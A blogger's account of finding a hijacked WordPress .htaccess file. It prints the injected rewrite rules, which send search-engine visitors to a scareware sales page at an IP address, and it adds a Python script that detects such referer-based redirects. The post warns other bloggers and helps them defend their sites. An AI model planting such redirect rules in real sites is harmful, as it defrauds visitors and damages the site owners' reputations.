A few days ago, I was working on one of my blogs, and I happened to notice that the .htaccess file was larger than I remembered. I am talking about file size here. Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes, I am a geek.
Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scumbag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. Its purpose? To fake people out and sell anti-virus software. That’s it.
The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…
```apache
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
```
The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc.), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!
Can you guess what that does to my reputation for first-time visitors?
Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.
```apache
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
```
Gotta Respect Google
The downside to having a popular blog? Google comes by often. This would be a good thing, normally. Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and set up a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?
But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.
I requested a review at 11am this morning, and by 11pm, my site was back online. Kudos, Google, on having your process down pat and helping *the-little-guy* get back up and running so quickly.
So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.
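One way to run that check automatically, as an added example that is not part of the original post: a short Python script that flags any RewriteRule sending visitors to an absolute URL when it is gated on HTTP_REFERER, which is the pattern the injected rules use. The function name and the embedded sample file are constructed for illustration.

```python
import re

# Constructed sample: the stock WordPress block plus an abridged copy of the
# injected rules shown in this post (one directive per line).
SAMPLE = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
"""

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def find_referer_redirects(text):
    """Return (line_no, target, referer_patterns) for each RewriteRule that
    sends visitors to an absolute http(s) URL and is gated on HTTP_REFERER."""
    findings, pending = [], []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND.match(line)
        if m:
            pending.append((m.group(1), m.group(2)))  # conditions attach to the next rule
            continue
        m = RULE.match(line)
        if m:
            target = m.group(2)
            referers = [pat for var, pat in pending if "HTTP_REFERER" in var.upper()]
            if referers and re.match(r"https?://", target, re.I):
                findings.append((no, target, referers))
            pending = []  # a RewriteRule consumes the conditions before it
    return findings

if __name__ == "__main__":
    for no, target, referers in find_referer_redirects(SAMPLE):
        print(f"line {no}: redirects to {target} when Referer matches {referers}")
```

To check a real file, pass its contents to `find_referer_redirects()` instead of `SAMPLE`; a stock WordPress .htaccess should produce no findings.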
This virus-like hack is also called:
- 89.28.13.202 virus
- Redirection hack
- .htaccess hack
Know of any other names it’s called by?